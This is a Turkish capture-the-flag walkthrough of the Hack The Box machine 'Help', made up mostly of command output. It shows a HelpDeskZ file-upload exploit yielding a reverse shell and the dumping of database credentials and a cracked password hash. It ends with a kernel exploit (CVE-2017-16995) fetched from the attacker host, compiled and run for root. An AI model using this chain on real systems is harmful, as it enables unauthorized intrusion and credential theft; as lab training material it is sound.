| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Help - HTB | Kolay | Linux |
Walkthrough
nmap taraması:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3000'de hiç bir şey bulamadım. Bunun üzerine 80'e odaklandım. gobuster taraması attığımda aşağıdaki sonuçları aldım.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.121/ --no-error -t 50 --extensions php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt| tee gobuster3
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.121/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,html
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/09/12 09:04:47 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.121/.htpasswd/ (Status: 403) [Size: 297]
http://10.10.10.121/.htpasswd.php (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.txt (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.html (Status: 403) [Size: 301]
http://10.10.10.121/.htaccess/ (Status: 403) [Size: 297]
http://10.10.10.121/.htaccess.php (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.txt (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.html (Status: 403) [Size: 301]
http://10.10.10.121/icons/ (Status: 403) [Size: 293]
http://10.10.10.121/index.html (Status: 200) [Size: 11321]
http://10.10.10.121/javascript/ (Status: 403) [Size: 298]
http://10.10.10.121/server-status/ (Status: 403) [Size: 301]
http://10.10.10.121/support/ (Status: 200) [Size: 4453]
http://10.10.10.121/support/ adresinde HelpDeskZ isimli bir uygulama koşuyor. Default credential yok ancak verion numarasına göre yayınlanmış bazı exploitler var.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# searchsploit HelpDeskZ
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
İkinci bir gobuster taramamda http://10.10.10.121/support/readme.htm adresini buldum ve burada version numarasının 1.0.2 olduğu yazılıydı yani exploitleri kullanabiliriz ancak bir türlü unauthentated exploit olan dosya yüklemeyi kullanamadım. Bunun üzerine internette araştırmaya başladım.
https://gist.githubusercontent.com/dasithsv/d2b0c8cea39096e19f336f5e29bbf803/raw/a6d24e637a9fb3dfb7c6d1598980af2594f6a168/HelpDeskZ 1.0.2 - Arbitrary File Upload.py
adresinde exploiti okuduğumda aslında mevcut exploiti yanlış kullandığımı gördüm. Sisteme ilk önce bir dosya yüklemem gerekmekte http://10.10.10.121/support/?v=submit_ticket&action=confirmation adresinden reverse shell'imi yükledim daha sonra exploiti çalıştırdım.
┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php 130 ⨯
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
1631455471
┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# nc -lvp 1234 1 ⨯
listening on [any] 1234 ...
10.10.10.121: inverse host lookup failed: Unknown host
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.121] 38868
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
07:04:34 up 56 min, 0 users, load average: 1.15, 1.27, 1.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$
Ve reverse aldım. İlk flagi okuyalım.
help@help:/home$ cd help
cd help
help@help:/home/help$ ls
ls
total 76
drwxr-xr-x 7 help help 4096 Jan 11 2019 .
drwxr-xr-x 3 root root 4096 Nov 27 2018 ..
-rw-rw-r-- 1 help help 272 Jan 11 2019 .bash_history
-rw-r--r-- 1 help help 220 Nov 27 2018 .bash_logout
-rw-r--r-- 1 root root 1 Nov 27 2018 .bash_profile
-rw-r--r-- 1 help help 3771 Nov 27 2018 .bashrc
drwx------ 2 help help 4096 Nov 27 2018 .cache
drwxr-xr-x 4 help help 4096 Sep 12 06:08 .forever
-rw------- 1 help help 442 Nov 28 2018 .mysql_history
drwxrwxr-x 2 help help 4096 Nov 27 2018 .nano
drwxrwxr-x 290 help help 12288 Jan 11 2019 .npm
-rw-r--r-- 1 help help 655 Nov 27 2018 .profile
-rw-rw-r-- 1 help help 66 Nov 28 2018 .selected_editor
-rw-r--r-- 1 help help 0 Nov 27 2018 .sudo_as_admin_successful
-rw-rw-r-- 1 help help 225 Dec 11 2018 .wget-hsts
drwxrwxrwx 6 root root 4096 Jan 11 2019 help
-rw-rw-r-- 1 help help 946 Nov 28 2018 npm-debug.log
-rw-r--r-- 1 root root 33 Nov 28 2018 user.txt
help@help:/home/help$ cat user.txt
cat user.txt
bb8a7b36bdce0c61ccebaa173ef946af
Daha sonrasında makine içerisinde inceleme yaptım. İşte ilginç bulduğum sonuçlar.
help 685 0.0 0.2 947668 2992 ? Ssl 06:08 0:00 /usr/bin/nodejs /usr/local/lib/node_modules/forever/bin/monitor /home/help/help/dist/bundle.js
help 695 0.7 3.7 990444 36928 ? Sl 06:08 0:27 _ /usr/bin/nodejs /home/help/help/dist/bundle.js
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
:
help@help:/var/www/html/support$ find /var/www/html/support -name "*config*" 2>/dev/null
<port$ find /var/www/html/support -name "*config*" 2>/dev/null
/var/www/html/support/includes/config.php
help@help:/var/www/html/support$ cat /var/www/html/support/includes/config.php
<port$ cat /var/www/html/support/includes/config.php
<?php
$config['Database']['dbname'] = 'support';
$config['Database']['tableprefix'] = '';
$config['Database']['servername'] = 'localhost';
$config['Database']['username'] = 'root';
$config['Database']['password'] = 'helpme';
$config['Database']['type'] = 'mysqli';
?>help@help:/var/www/html/support$
mysql> select * from users;
select * from users;
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| id | salutation | fullname | email | password | timezone | status |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| 1 | 0 | helpme | [email protected] | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
| 2 | 0 | xcvxv | [email protected] | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL | 1 |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:sha1:godhelpmeplz
[*] fst130 Does 'help' have mail?.......................................... yes!
---ore--(4%)
--More--(4%)
-rw-rw---- 1 help mail 27501 Sep 12 08:35 /var/mail/help
var _user = { username: '[email protected]', password: '5d3c93182bb20f07b994a7f617e99cff' };
Bunların hiçbiri işe yaramadı bende exploit suggester çalıştırdım.
help@help:/tmp$ wget http://10.10.14.18/linux-exploit-suggester.sh
wget http://10.10.14.18/linux-exploit-suggester.sh
--2021-09-12 10:12:06-- http://10.10.14.18/linux-exploit-suggester.sh
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'
linux-exploit-sugge 100%[===================>] 86.81K 466KB/s in 0.2s
2021-09-12 10:12:06 (466 KB/s) - 'linux-exploit-suggester.sh' saved [88891/88891]
help@help:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
help@help:/tmp$
help@help:/tmp$
help@help:/tmp$
help@help:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
78 kernel space exploits
48 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-5899] s-nail-privget
Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
Exposure: probable
Tags: [ ubuntu=16.04 ],manjaro=16.10
Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
Comments: Distros use own versioning scheme. Manual verification needed.
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
help@help:/tmp$ wget http://10.10.14.18/cve-2017-16995.c
wget http://10.10.14.18/cve-2017-16995.c
--2021-09-12 10:57:57-- http://10.10.14.18/cve-2017-16995.c
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'
cve-2017-16995.c 100%[===================>] 13.41K --.-KB/s in 0.09s
2021-09-12 10:57:57 (157 KB/s) - 'cve-2017-16995.c' saved [13728/13728]
help@help:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
help@help:/tmp$ ls
ls
total 1040
drwxrwxrwt 10 root root 4096 Sep 12 10:58 .
drwxr-xr-x 22 root root 4096 Nov 28 2018 ..
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .ICE-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .Test-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .XIM-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .font-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 VMwareDnD
-rwxrwxrwx 1 help help 18440 Sep 12 10:58 cve-2017-16995
-rw-rw-rw- 1 help help 13728 Sep 12 10:52 cve-2017-16995.c
-rwxrwxrwx 1 help help 452509 Aug 26 13:47 linpeas.sh
-rwxrwxrwx 1 help help 88891 Sep 8 14:58 linux-exploit-suggester.sh
-rwxrwxrwx 1 help help 41177 Sep 8 14:34 lse.sh
-rw-rw-rw- 1 help help 200427 Sep 12 07:12 result1
-rw-rw-rw- 1 help help 193317 Sep 12 08:36 result2
drwx------ 3 root root 4096 Sep 12 06:08 systemd-private-f9459c97985149de9df4c8fd9c15df9e-systemd-timesyncd.service-Ka57wQ
drwx------ 2 root root 4096 Sep 12 06:08 vmware-root
help@help:/tmp$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003af7ba00
[*] Leaking sock struct from ffff88001f403c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003912bbc0
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003912bbc0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b7fe6082dcdf0c1b1e02ab0d9daddb98
İlk Yorumu Siz Yapın